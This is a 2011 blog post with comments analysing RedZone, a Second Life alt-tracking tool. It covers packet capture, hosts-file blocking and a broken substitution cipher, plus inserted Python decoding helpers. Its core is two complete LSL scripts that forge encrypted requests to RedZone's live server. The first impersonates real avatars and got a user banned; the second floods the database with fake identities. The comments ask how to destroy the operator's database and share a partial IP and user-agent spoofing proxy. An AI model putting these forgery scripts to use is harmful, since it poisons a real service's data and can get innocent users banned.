Adventures With RedZone

10 02 2011

In a message yesterday I explained how RedZone is exploiting the Parcel Media security hole in the Second Life Client software to make your browser silently send customised and personalised HTTP GET requests back to the isellsl.ath.cx website. When I became aware that someone was using RedZone in a dance club sim I had entered (bad owner! How are we supposed to keep our media disabled in such places?) I decided to investigate what was being sent back to base.

The first thing I did was to fire up Wireshark (formerly known as Ethereal). Wireshark is an amazingly useful tool – a graphical form of the equally useful tcpdump. It allows you to monitor traffic on any and all of your network interfaces, and is invaluable for diagnosing network performance issues and other network administration tasks.

In this case I knew what RedZone must be doing so all I needed to really look for was HTTP traffic. I applied a filter and logged into the dance club, enabling my media. Almost immediately I captured a TCP stream with a dodgy looking get request, which on analysis with wireshark (choose “analyse/follow TCP Stream”) looked like this:

[Image: Wireshark output window showing the captured TCP stream with the GET request]

Some things struck me right away:

1. The stream is unencrypted. It has to be, being vanilla HTTP. I do not think a secure stream using TLS is likely, because the Second Life client would need a certificate exchange. A self-signed certificate would raise the exact security warning that the spyware writers want to avoid. Commercial certificates would be expensive, hard to obtain and subject to revocation if users asked the Certification Authority to revoke them because they were being used for spyware. So vanilla HTTP it will stay.

2. The variables being passed are quite guessable. Let’s look at these:

– The n variable looks like an SL name. It is clearly encrypted, but the space in it appears exactly where the space appears in my real, unencrypted name.

– The o, j and d variables appear to be the same length as UUIDs, and the r characters appear where the hyphens would appear in a UUID.

– Some of the information is unencrypted and is clearly information about my avatar age and payment information.

– The e variable is always “pscan”, although its existence suggests that other kinds of control URLs may be possible.

– The location is your location (more or less), not the location of the RedZone device. It may be the location of the flying probe RedZone uses to get around the 96 metre scan range problem. These probes, by the way, can cause lag.

Having discovered this scan URL, I immediately applied the quick and dirty fix I described before. I added this to my hosts file:


127.0.0.1 isellsl.ath.cx

This would ensure I would capture all future packets meant for the spyware collector. (Actually I used the IP address of my LAMP server rather than localhost, but for this explanation I will assume I did it all on my laptop.)
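As an added check that is not part of the post, the following Python reads a hosts file the way the resolver does and reports whether each beacon hostname is sinkholed and where it points. It accepts loopback or a sinkhole address of your choice, since the author used his LAMP server rather than localhost. The hosts text and the 10.0.0.5 capture address are constructed; isellsl.ath.cx is the collector named above. It only inspects the file: it cannot see a browser or system proxy setting, which bypasses the hosts file altogether (a commenter below ran into exactly that), nor a DNS cache, so treat a passing result as necessary, not sufficient.

```python
"""Check that beacon hostnames are sinkholed by the hosts file (added example, not from the post)."""
import ipaddress


def parse_hosts(text):
    """Return {name_lower: [address, ...]} from hosts-file text, in file order.
    Mirrors the resolver: '#' starts a comment, fields are whitespace separated
    (tabs included), the first field is the address and every later field is a
    name or alias for it; names are case-insensitive. Malformed lines are skipped."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # an address with no names binds nothing
        try:
            address = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: malformed line
        for name in fields[1:]:
            table.setdefault(name.lower(), []).append(address)
    return table


def sinkhole_status(hosts_text, names, sinkhole_ips=("127.0.0.1",)):
    """For each name return (address_or_None, sinkholed). The first matching line
    wins, as in the resolver. A name counts as sinkholed when it points at loopback
    or at one of sinkhole_ips (e.g. the address of your own capture server).
    A missing name falls through to DNS, i.e. the beacon still reaches the collector."""
    accepted = {ipaddress.ip_address(ip) for ip in sinkhole_ips}
    table = parse_hosts(hosts_text)
    report = {}
    for name in names:
        addresses = table.get(name.lower())
        if not addresses:
            report[name] = (None, False)
        else:
            first = addresses[0]
            report[name] = (str(first), first.is_loopback or first in accepted)
    return report


def all_sinkholed(hosts_text, names, sinkhole_ips=("127.0.0.1",)):
    """True only if every name is covered; one uncovered name is one leak."""
    return all(ok for _, ok in sinkhole_status(hosts_text, names, sinkhole_ips).values())


# Constructed hosts file. isellsl.ath.cx is the collector named in the post; the
# 10.0.0.5 entry points at a hypothetical capture server of our own, as the author did.
SAMPLE_HOSTS = """\
# constructed example hosts file
127.0.0.1\tlocalhost
::1       localhost ip6-localhost
127.0.0.1 isellsl.ath.cx          # RedZone beacon collector
10.0.0.5  ISELLSL.COM lamp.lab.example   # own capture server (hypothetical address)
"""

if __name__ == "__main__":
    checks = sinkhole_status(
        SAMPLE_HOSTS, ["isellsl.ath.cx", "isellsl.com", "girlsofthevip.com"],
        sinkhole_ips=("127.0.0.1", "10.0.0.5"),
    )
    for name, (addr, ok) in checks.items():
        print(f"{name:20} -> {addr or 'DNS (not sinkholed)':22} {'OK' if ok else 'LEAKS'}")
```

Run it against your real file (C:\WINDOWS\system32\drivers\etc\hosts on Windows, /etc/hosts elsewhere) with the full list of collector domains; a name that resolves through DNS, or to an address you did not choose, is a leak.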

Now whilst that entry alone kills RedZone, I was curious about the data being passed. So I immediately wrote my own capture script called rz2.php and placed it on my own server. This script does a few things:

1. It emails me an alert any time I enter a RedZoned sim.
2. It saves a copy of the offending HTTP request.
3. It inserts the data into my own database, so that I automatically build a database of the RedZone sims I visit.

Now armed with data capture facilities, I logged in an alt. I then looked at what I collected and discovered some fundamental weaknesses. Most notably, this encryption is the most brain dead I have ever seen.

Really!

It is quite clear that the RedZone author does not really understand security. I could educate him how to fix this – but I don’t wish to unless he first gets a clue about collation of personal data. I could make a better RedZone myself without the flaw – but I am not amoral, and I choose to obey the law.

Nevertheless, cracking the encryption was a doddle. It is basically a simple monoalphabetic substitution cipher. I did not even need a computer – paper and pen were almost enough to crack it when I first saw it. However, I was missing a few letters. Most of the missing letters were guessable, and those that were not were recoverable by logging in alts with those letters in their names.

Here is the cipher used. The first line is the clear text character, the second line the substituted character (the leading space is part of the alphabet: a space maps to a space):

 -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
 rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a

Now that I could decrypt the packets, I quickly modified my PHP code to decrypt what I was seeing. With UUIDs and my avatar name decrypted, I quickly saw that of the UUID variables, “d” was my own UUID and “o” was the UUID of the owner of the RedZone that was scanning me. I linked this with an online key2name database to show me the owners of all RedZones I find. I am not sure yet what j is, although I somewhat suspect it is the UUID of the prim of the RedZone device sending the record, as it certainly never changes for any particular RedZone site.
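The capture script rz2.php is not reproduced in this post, so as an added example (my code, not the author's) here is the decoding side of such a sinkhole in Python: it applies the substitution table above, parses the pscan query string out of an access-log line as the capture script would see it, and flags the structural leak that made the cipher guessable without a computer, the r sitting at the hyphen positions of every ciphered UUID. The log line, avatar name and UUIDs are constructed; the parameter names e, n, o, l, j, d, p, g and age are the ones seen in the post, and the assumption that only n, o, j and d are substituted follows the observations above.

```python
"""Decode RedZone 'pscan' beacons logged by a sinkhole (added example, not rz2.php)."""
import re
from urllib.parse import parse_qs, quote, urlsplit

# Substitution table from the post: CLEAR[i] travels on the wire as CIPHER[i].
CLEAR = " -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
CIPHER = " rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a"
assert len(CLEAR) == len(CIPHER) == 64 and len(set(CIPHER)) == 64  # a true bijection

ENC_TABLE = str.maketrans(CLEAR, CIPHER)
DEC_TABLE = str.maketrans(CIPHER, CLEAR)

# Fields the post identified as substituted; the rest (e, l, p, g, age) travel in clear.
CIPHERED_FIELDS = ("n", "o", "j", "d")
UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$")
# Apache/nginx-style access log: only the request line is needed.
REQUEST_RE = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]"')


def encrypt(text):
    """Apply the substitution the device applies before building its URL.
    Characters outside the 64-character alphabet pass through unchanged."""
    return text.translate(ENC_TABLE)


def decrypt(text):
    """Invert the substitution (same caveat for characters outside the alphabet)."""
    return text.translate(DEC_TABLE)


def uuid_structure_leaks(cipher_value):
    """True if a value has UUID shape *before* decoding: 36 characters with the
    image of '-' (the letter r) at offsets 8, 13, 18 and 23. A monoalphabetic
    substitution preserves length and position, which is what made it guessable."""
    return len(cipher_value) == 36 and all(cipher_value[i] == "r" for i in (8, 13, 18, 23))


def decode_pscan(url):
    """Parse one beacon URL into a dict, decoding the substituted fields and flagging
    UUID fields that do not decode to a UUID (a changed table, or a poisoned record)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    record = {}
    for name, values in params.items():
        value = values[0]
        record[name] = decrypt(value) if name in CIPHERED_FIELDS else value
    for name in ("o", "j", "d"):
        if name in record and not UUID_RE.match(record[name]):
            record[name + "_warning"] = "does not decode to a UUID"
    return record


def decode_log_line(line, host="isellsl.ath.cx"):
    """Pull the request path out of an access-log line and decode it;
    None if the line carries no GET request line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    return decode_pscan("http://" + host + match.group("path"))


# Constructed sample: a name and UUIDs that belong to nobody. The query layout
# (e, n, o, l, j, d, p, g, age) follows the URLs shown in the post.
SAMPLE_NAME = "Example Resident"
SAMPLE_UUID = "12345678-1234-4abc-8def-0123456789ab"
SAMPLE_OWNER = "00000000-0000-4000-8000-000000000000"
SAMPLE_PATH = (
    "/rz2.php?e=pscan"
    + "&n=" + quote(encrypt(SAMPLE_NAME))   # the space survives as %20, as observed
    + "&o=" + encrypt(SAMPLE_OWNER)
    + "&l=Example%20Region/128/128/25"
    + "&j=" + encrypt(SAMPLE_OWNER)
    + "&d=" + encrypt(SAMPLE_UUID)
    + "&p=no&g=0&age=2010-09-26"
)
# Constructed access-log line, as the sinkhole web server would record the beacon.
SAMPLE_LOG_LINE = (
    '198.51.100.7 - - [10/Feb/2011:21:14:03 +0000] "GET ' + SAMPLE_PATH
    + ' HTTP/1.1" 200 0 "-" "Mozilla/5.0 SecondLife/2.5.0 (Second Life Release)"'
)

if __name__ == "__main__":
    for field, value in decode_log_line(SAMPLE_LOG_LINE).items():
        print(f"{field:>4}: {value}")
```

Because a monoalphabetic substitution keeps length and position, uuid_structure_leaks needs no key at all: it classifies a field as a UUID from the four r characters alone, which is the same property that left the spaces in ciphered names visible. decode_pscan flags any o, j or d that no longer decodes to a UUID, which is the first thing to check when the collector changes its table (the comments below report that it did).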

Now then. What could I do with this information?

Well one big question: What would happen if I sent back my own response to RedZone using data about some other avatar? The problem is: how would I know it had worked? I will not buy RedZone, so how would I know if that other user was now listed as my alt? I would clearly need the user’s permission too.

The solution was to find someone listed as a copybot (and thus banned on all RedZone sims) or some other banned person and ask if they minded me experimenting in this way. Finding the user was not hard – I just looked at ban lists in various RedZone sims and looked the user up in the RedZone site’s neighbourhood watch until I found a candidate. I then spoke to them about what I planned and with their permission, I logged in an alt of mine on a nice fresh IP address and wrote the script below to deliver the payload:

integer listen_handle;
integer channel=1 ;
string clearText= " -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" ;
string cipherText=" rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a" ;
string newText="" ;
key keyname;
key keyborn ;
key keypayinfo ;
string myname="";
string encname="" ;
string myborn="";
string myuuid="";
string mypayinfo="" ;
key avquery ; 
list allbits=["&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Vsevolod/148/59/115&j=6Pzc7xxbrvPnxrvX8nr8czcrcPcnzXb6zv7Z",
    "&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Whitmyre/168/61/22&j=0nb8xbbmr6cvbr87xcrXXv9rb6n8c89ZvPvz" 
];
string myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
string obit ;
string locbit ;
//
string substitute(string baseChar, string clearText, string cipherText) {
    string ss="" ;
    integer pos = llSubStringIndex(clearText,baseChar) ;
    ss=llGetSubString(cipherText,pos,pos) ;
    if (ss==" ") ss="%20" ;
    return ss ;
}
//
string encrypt(string plainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(plainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(plainText,i,i),clearText, cipherText) ;
    } 
    return resultStr ;
}
//
string decrypt(string nonplainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(nonplainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(nonplainText,i,i),cipherText, clearText) ;
    } 
    return resultStr ;
}
//   
default
{
    state_entry()
    {
        listen_handle = llListen(channel, "", llGetOwner(), "");
        llOwnerSay("Starting: Type /1 SL-User-UUID  to create a RedZone poison URL for that user") ;
    }
//
    listen( integer channel, string name, key id, string message )
    {

        allbits=llListRandomize(allbits,2) ; // allbits is a stride 2 list
        obit=llList2String(allbits,0) ;
        locbit=llList2String(allbits,1) ;
        myuuid=message ;
        keyname=llRequestAgentData((key) message,DATA_NAME ) ;
        keypayinfo=llRequestAgentData(message,DATA_PAYINFO) ;
        keyborn=llRequestAgentData((key) message,DATA_BORN) ;
    }
//    
    dataserver(key queryid, string data)
    {
        if ( keyname == queryid )
        {
            myname = data;
            llOwnerSay("Cloning : " + myname); 
            encname=encrypt(myname) ;
            myurl+="&n=";
            myurl+=encname ;
            myurl+=obit ;
            myurl+="&d=" ;
            myurl+=encrypt(myuuid) ;
            myurl+=locbit;
            
        }
//
        if ( keypayinfo == queryid )
        {
            mypayinfo = data ;
            if (mypayinfo=="1") {
                myurl+="&p=yes&g=0" ;
            }
            else {
                myurl+="&p=no&g=0" ;
            }
//           
        }
        
        if ( keyborn == queryid )
        {
            myborn = data ;
            myurl+="&age=" ;
            myurl+=myborn ;
            llOwnerSay(myurl) ;
            myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
        }
    }
//    
    on_rez(integer param)
    {   
        llResetScript();//By resetting the script on rez forces the listen to re-register.
    }
    changed(integer mask)
    {   
        if(mask & CHANGED_OWNER)
        {
            llResetScript();
        }
    }
}

It worked like a dream. RedZone immediately informed me this user was banned. I was also able to send real data about my alt and get the alt banned too, because now we shared an IP address.

So yes the code above will insert data into the RedZone database.

One question: Will the data stay in the database? If I were to insert hundreds of people into the database all from my IP address, would it be possible to write a data cleansing algorithm to remove these values?

Certainly it would. A whole IP address could be written off as giving false data – although it is likely that it would write off any real alts listed under that address at the same time – particularly if you were careful not to register hundreds of alts all at once.

Sadly it would cause innocent people problems with duped RedZone owners to add hundreds of alts of real users to the database. So here is a fun variation on the above code: Instead of entering real SL users, what if you entered some random data instead? Make up a name, and the associated alt data, generate a random UUID and enter this?

You see, the RedZone database is not an inworld database. There is no offline complete list of avatars and UUIDs (although there are some very large name2key databases). So when you report your information to the RedZone database, it presumably has to believe you! In this way you can enter a huge number of “alts” (and share them with your friends if you wish), and have a good laugh the next time someone comes to you (as they came to me) and tells you “I know all your alts”.

May I ask you though, if you are trying this at home: please do not use the data of real users without their permission. Just because RedZone messes with people does not mean we should too.

Remember that these random users will enter the database with YOUR IP address. Of course, to add them with someone else’s IP address, just ask them to click the link too. Make sure you tell them what the link does so they can make an informed choice about it.

integer listen_handle;
integer channel=1 ;
string clearText= " -0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" ;
string cipherText=" rzmnCXZbvcx09876POIUY54321pTREWQoiuyLKJHGtewqlFDSAkjhgMNBVfds-a" ;
string newText="" ;
key keyname;
key keyborn ;
key keypayinfo ;
string myname="";
string encname="" ;
string myborn="";
string myuuid="";
string mypayinfo="" ;
key avquery ; 
list allbits=["&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Vsevolod/131/65/110&j=6Pzc7xxbrvPnxrvX8nr8czcrcPcnzXb6zv7Z",
    "&o=z0vmX8P0r8cmxrX8P9r98v0r0bbCbcxmc67n","&l=Whitmyre/124/41/22&j=0nb8xbbmr6cvbr87xcrXXv9rb6n8c89ZvPvz" 
];
string myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
string obit ;
string locbit ;
//
string substitute(string baseChar, string clearText, string cipherText) {
    string ss="" ;
    integer pos = llSubStringIndex(clearText,baseChar) ;
    ss=llGetSubString(cipherText,pos,pos) ;
    if (ss==" ") ss="%20" ;
    return ss ;
}
string encrypt(string plainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(plainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(plainText,i,i),clearText, cipherText) ;
    } 
    return resultStr ;
}
string decrypt(string nonplainText) {
    integer i ;
    string  resultStr="" ;
    integer ptlen = llStringLength(nonplainText) ;
    for ( i=0 ; i<ptlen ; i++ ) {
      resultStr+=substitute(llGetSubString(nonplainText,i,i),cipherText, clearText) ;
    } 
    return resultStr ;
}
//    
default
{
    state_entry()
    {
        listen_handle = llListen(channel, "", llGetOwner(), "");
        llOwnerSay("Starting: Type /1 name=Random Name") ;
        llOwnerSay("Type /1 age=Random Name in format yyyy-mm-dd e.g. 2010-09-26") ;
        llOwnerSay("Type /1 uuid=Random uuid. Try http://www.famkruithof.net/uuid/uuidgen ") ;
        llOwnerSay("Type /1 go") ;
        llOwnerSay("Click the URL to add a random nobody to Redzone") ;
    }

    listen( integer channel, string name, key id, string message )
    {
        list msg=llParseString2List(message,[" ","="], []);
 
        if (llList2String(msg, 0)=="name") {
            myname=llList2String(msg,1)+" "+llList2String(msg,2) ;
            llOwnerSay("Name set to "+myname) ;
        }  
        else if (llList2String(msg, 0)=="age") {
            myborn=llList2String(msg,1);
            llOwnerSay("Age set to "+myborn) ;
        }
        else if (llList2String(msg, 0)=="uuid") {
            myuuid=llList2String(msg,1);
            llOwnerSay("Uuid set to "+myuuid) ;
        }
        else if (llList2String(msg, 0)=="go") {
            allbits=llListRandomize(allbits,2) ; // allbits is a stride 2 list
            obit=llList2String(allbits,0) ;
            locbit=llList2String(allbits,1) ;
            myurl="http://isellsl.ath.cx/rz2.php?e=pscan" ;
            myurl+="&n=";
            myurl+=encrypt(myname) ;
            myurl+=obit ;
            myurl+="&d=" ;
            myurl+=encrypt(myuuid) ;
            myurl+=locbit;
            myurl+="&p=no&g=0" ;
            myurl+="&age=" ;
            myurl+=myborn ;
            llOwnerSay(myurl) ;
            
        }        
    }   
    on_rez(integer param)
    {   // Triggered when the object is rezzed, like after the object has been sold from a vendor
        llResetScript();//By resetting the script on rez forces the listen to re-register.
    }
    changed(integer mask)
    {   // Triggered when the object containing this script changes owner.
        if(mask & CHANGED_OWNER)
        {
            llResetScript();
        }
    }   
}

So in summary: RedZone is an extremely naïve system. Its reliance on IP addresses and User Agents to identify alts and copybotters respectively is foolish and wrongheaded. The way data is passed to the server would get no marks at all in a class on building secure web based systems. (Ok, maybe half a mark for the substitution cipher. At least the writer thought about it). The potential for causing havoc with this database is huge.

Better and more secure systems are certainly possible. This one is really an object lesson in how not to write your spyware.


28 responses

11 02 2011
cool_on_the_corner

I say link all users of redzone to known copybotters as alts. Let the people supporting a hacker feel what it is like to have their second life disrupted.
Then people can look on the data base and then at each other thinking they are griefers or copybots. The notion that everyone gives up their IP is a joke. I use a proxy so that I have that buffer between me and people snooping in my computer. Now if I could do so in SL even better since this redzone spyware is in second life. We do not need dishonest people like the maker of redzone poking his nose in our computers. Anyone know how to send a bad bug back into his server and destroy his database? if he wants to hack our computers…. what is good for the goose is good for the gander.

11 02 2011
Azure Twine

The first rule of hacking is “don’t talk about hacking” :)

Instead of making this info so public, it probably would have best been served used in an intelligent, sparing manner. Now redzone asshat knows we know how he does things so he will likely change it up. Its like giving information to the enemy.

And yeah we broke his lame ass cypher quickly too. I mean he at least could have used md5 encryption like all the other amateurs. It is surprising to me how much of the stream is in plain text. Why encrypt some and not all?

11 02 2011
Karen

it’s funny to hear redzones customers worried about privacy issues with the product that they own.
http://isellsl.ath.cx/madsci/forum/viewtopic.php?f=12&t=378

11 02 2011
no2redzone

Azure, yes, I understand that viewpoint. But I am not a hacker, I was merely experimenting with a site that seemed to be offering me media content but no such content ever arrived. I am no hacker 😉

Now what is the intelligent manner to use the information I discovered? If I make it public it is clear to even Redzoneophiles that their system is broken. That all those people listed as alts are quite possibly just random data inserted into the system.

Yes it alerts zFire to the problem. But in fact he knows already. There have several times been threads on the RedZone forums about his database having been hacked. On each occasion, rather than improve his lame software, he has simply deleted the threads (and somehow shut up the complainers – perhaps with product refunds).

I rather like the idea that people know what zFire has been hushing up.

Karen, yes I was amused by that link too.

11 02 2011
Laura

Guys.. guys…. zFire is a genius! Just admit it. You need to get a life, seriously, and stop slandering zF RedZone. It works, it’s effective, and it protects us – content creators – from hackers and thieves like you.
Cheers!

11 02 2011
no2redzone

Thank you for the laugh Laura. I notice that zFire is defending RedZone in his own forums by posting up some kind of evidence that someone I don’t know is or was involved in copybot activities. I further notice that he discovered this information NOT using Redzone, but the way all intelligent people do it – by inspecting objects.

RedZone does not detect copybots. It detects user agent strings. That is why people have been mislabelled as “copybots” and banned on all RedZone sims simply because they compiled a client from source code! (which is allowed). Whereas people actually using hacked clients ensure that the user agents are correct, and thus are not caught by RedZone.

Banning people for messing with their user agent string amounts to griefing in my book.

But if you had even bothered to consider this post you would realise by now that RedZone is ineffective. If you ban someone it is trivial for them to appear to be the alts of all your real guests. This is extremely dangerous for you if you use RedZone. I strongly advise you do not use the option in RedZone to ban matching alts. It will only get you into trouble.

11 02 2011
Karen

Another thing is that LL does warn you about two things concerning media. If you install a new viewer LL warns you that having play media can leave you open to problems. The other is playing streaming media uses more bandwidth and can slow down your performance. So people wishing to have their computers run faster and safer in SL would of course leave all media turned off.
With redzones ban people with media turned off option, content makers are only hurting themselves by using this to turn away people with slower computers or that decided to heed LL warning about having media enabled.
The angry person who was banned for not having media turned on only hurts them more when this person bad mouths the place banning them for no apparent reason and more people either do not visit their sim or if they do, they come back with friends and grief it making their nightmares become a reality.
If a sim is using this hack to invade my computer, then I have no desire to be there. is there a way to warn people prior to teleporting that the sim they wish to enter has this system beforehand? it would save a lot of wasted time.

11 02 2011
Tay

Hey, I was trying to add some random generated fake names to add to my rz alt list but came across this problem when clicking the link

“GMytdbn kzpplVMb~vsc3Lh3bRbcLzRshu8Rx9vbR2uxh2bbHsb3b~Visitor~no~Secondlife.~1~0~ Fatal error: Cannot break/continue 1 level in /Library/WebServer/Documents/rz2.php on line 47”

Ive copied the code above to a script and rezzed it in a box, added the fake info on /1 and click the link it gives me. Any help you can give? Thanks.

11 02 2011
no2redzone

Hi Tay, nothing wrong with the code. The PHP script at the RedZone server end is hitting a break because zFire is desperately working on his server to try and plug the hole.

The good news, whilst only temporary, is that this almost certainly means that all RedZones are currently failing to collect any data, and presumably will continue to fail until zFire rolls out his next update.

11 02 2011
txwalrus

I wonder if they are moving to a new domain… this on the home page of http://isellsl.ath.cx/

“Welcome to the NEW iSellSl.com
We are moving here, and merging the old site. =)”

My hosts file is updated already!!

11 02 2011
txwalrus

Quick followup: http://isellsl.com redirects to http://isellsl.ath.cx/

11 02 2011
Tay

Hahaha, well thats a small step in the right direction. Thanks for the quick answer. I hope whenever zFire does update it you can share the code again. I recently found out from a “friend” (use the term loosely cause he only talks to me to show off or when he wants something) who has rz on his sim that I have 9 alts according to him and proceeded to list them off to me. Granted, all 4 of my alts were in the list, it also had attached 5 other names. When I told him, his words “Well it found your alts.”

He was perfectly fine with this less than 50% accuracy on this thing, and I know he’s shared “my alts” with at least one other person, probably others. Pretty much anyone on his friends list can inquire about someone and he’ll share any alts attached to name just to feel powerful. It blows my mind that people with legitimate business in SL would accept this kind of accuracy and invasion of privacy to their customers.

To zFire, who no doubt reads this: You can keep plugging the holes but it doesn’t change the fact your ship is sinking. The Jiras against it rise in votes daily. GZ is spreading like wildfire. Abandon it before you squander the ridiculous amount of money you’ve made off an unreliable stalker tool.

12 02 2011
Florimel Enderfield

Well, just a few comments.

1. Adding totally synthetic identities to zFire’s database. Who really cares about that? Doing that does nothing that makes RedZone’s unreliability noticeable to zFire’s co-conspirators. Doesn’t cause them any problems. Doesn’t cause them to receive any complaints. Doesn’t cause them to go screaming to zFire about RedZone banning large masses of people en masse. The only thing it does is cause zFire’s server to use a bit more storage space and given the size and cost of modern disk drives, I seriously doubt that he’ll even notice.

2. There is one attack avenue that we can do in addition to GreenZone, the JIRA’s in progress, etc. And it does meet the ethical standards of the ‘don’t harm innocents’ crowd. Namely the fact that RedZone uses the media security hole to correlate alts together is a red herring. Send in ARs on zFire for violating privacy. And the sweet thing is that zFire really can’t claim that there’s *any* reason for RedZone to report alt associations. Look at it this way.

The fact that multiple avatars are associated with the same real life person is private information that you have a reasonable expectation to remain private. It doesn’t matter how that association is achieved. It could be from zFire being an extremely personable individual who chats in IM with thousands of people. It could be from being an expert user of a ouija board. It could be from a large number of highly trained psychic monkeys. Or it could be an exploited security hole in the Second Life media system. The means of making that association is irrelevant. The disclosure of the associations is in direct violation of the 8.2(v) of the Linden Labs Terms of Service.
Now if it’s in violation of the ToS for zFire to manually disclose the associations, is it not also in violation for him to make such disclosures automatically?
And in what way does making those disclosures support the publicly claimed purpose of RedZone?

Is it needed for banning the alts of a griefer?
Nope. It’s entirely possible to have the “griefer alt” ejected from the sim without giving any notice as to the identity of the original banned avatar.

Is it needed for banning copybots?
Nope. Once again, it’s entirely possible to eject a copybot without revealing the identity of the copybot’s other avatars.

Now as you all know, it’s trivial to bypass RedZone and avoid being detected as an alt. And the battle to rid Second Life of that abomination and close the security hole that allowed it to be created needs to go on.
But also, let’s see about having a couple of thousand ARs submitted on zFire. Since that … creature … doesn’t seem to understand the concept of privacy and since he continues to violate the privacy expectations of Second Life users. He really should be appropriately thanked for his actions. And the appropriate thanks should be everyone submitting an AR on him so that the Lindens of Second Life can fully realize what a fine upstanding gentleman he really is. And hopefully, in rewarding him for his public service arrange for him to no longer have to sully his hands on a keyboard to interact with other Second Life residents.

12 02 2011
Jenni Darkwatch

FYI, there might be a fairly amusing way to royally mess up RZ. Provide a free way to redirect the request through an anonymizing proxy that scrambles the data.

Then everyone would simply appear as everyone elses alt. TOR would be an easy choice for that, _IF_ SL uses the proxy settings for media, which I don’t know.

However, the only true way to fix any such sillyness would be to incorporate some kind of trust mechanism into the client. Technically doable already, just a fair amount of work.

12 02 2011
Jenni Darkwatch

Actually, just did what I suggested, to a point.

On my web server I hosted this PHP file:

For testing I used a valid user client string though, not a bogus one. Then redirected requests there with the same hosts method you used. Voila. RZ got bogus info about IP, client, OS… thus breaking the alt detection. I didn’t mess with changing the URI values around as they’re available by script anyway.

13 02 2011
Wowzie Howzie

Okay, I can’t seem to make this work. I mimicked a client and sent URL’s to the server but they weren’t detected as alts. I tried using a RZ that was in another sim, by using local people there but could not get me linked to them. Have you continued your research?

13 02 2011
no2redzone

Wowzie, as expected, as soon as I published this article, zFire moved to partially plug the security hole. For about a day, no RedZones were recording anything, and various other things seem to have been broken. They are recording again, and zFire has clearly made some move to verify input.

This, of course, is why some people are upset I published the information here. On the other hand, I don’t think it will be hard to work around the fix again. The question is whether I should do so myself, and publish – allowing zFire to fix his braindead software again, or whether I should leave it to someone else.

I’ll leave that to readers to decide. I am happy to further my research, but the point of this posting was primarily to show how broken RedZone has been from its inception.

13 02 2011
Magnuz Binder

Well, I wouldn’t mind you giving zFire some more exercises to have him improve his next to non-existent programming skills another few 100 %. I mean, he’s already advanced to using ciphers invented by the old Romans.

I’m not surprised he found the time off from his patching to add to the laughs on these forums with his presence though. After someone explained to him, in one and two syllable words, what the new Linden Labs CEO’s views on privacy means to his spyware in the very near future, he probably realized it was better use of time to do like former Iraqi minister of information, Mohammad Said Sahhaf, and explain he is winning the war, hopefully convincing at least a few more scam victims to fill his pockets, while his little empire is tumbling down.

13 02 2011
Krise Shepherd

really nice article 🙂 i am interested in your php script and the approach you used inside SL to scan and log the rz SIMS, i want to do the same, and will contact you in world regarding this.

one thing though: the hosts entry trick won’t work if the user is behind a proxy and did not disable the ip that is set in hosts (e.g. 127.0.0.1). My friend who tried it was using a proxy and still could see that webpage in her browser after editing the hosts file, only disabling the proxy made the page be unaccessible.

greetings
Krise

13 02 2011
Wowzie Howzie

I say do it… I see this morning the encryption mechanism has changed in the new version.

14 02 2011
Sextan Shepherd

Greetings.

I am a content creator, but first of all I have morals and ethics and I really can’t understand how people with a “creative mind” can use this RZshit. Thanx NO2 for this blog and for letting us know about what you found out.

15 02 2011
Someone's Alt

To avoid being scanned by RedZone, add the following entries to your host file.

127.0.0.1 isellsl.ath.cx
127.0.0.1 isellsl.com
127.0.0.1 girlsofthevip.com
127.0.0.1 hamlinpro.com

You can find the file here (WinXP – Win7): C:\WINDOWS\system32\drivers\etc\hosts

There’s currently a hot discussion on the SL Universe Forums about this…
http://www.sluniverse.com/php/vb/general-sl-discussion/55250-how-stop-zf-redzone.html

Thanks 🙂

17 02 2011
Jenni Darkwatch

Sorry for the late reply… i don’t read this forum all too regularly. I’d be happy to post the script on the Marketplace, or send it in-world if need be. This comment board does seem to take exception to the code 🙂

Anyway, here’s another try on pasting the code, sans opening and closing tags. I set up my apache to answer to the various domains listed a few posts above me and redirect every request to this PHP snippet.

Fair warning, this does ONLY randomize your IP and “Viewer Version”. Seems to work fine. 🙂

—begin—
<?php
// Requires CURL to be installed. (Opening tag restored here; the comment board stripped it.)
$agents=array(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070605 [Second Life 1.18.2.1]",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070605 [Second Life (Second Life Release) - 1.18.2.1]",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080314 SecondLife/1.20.13.0 (Second Life Release; default skin)",
